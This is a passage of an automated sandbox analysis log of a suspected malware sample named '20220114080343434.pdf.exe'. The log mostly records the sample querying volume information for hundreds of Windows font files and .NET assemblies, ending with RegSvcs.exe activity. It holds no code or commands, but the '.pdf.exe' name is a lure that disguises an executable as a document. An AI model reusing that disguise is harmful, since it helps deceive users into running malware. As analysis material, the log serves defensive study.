                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
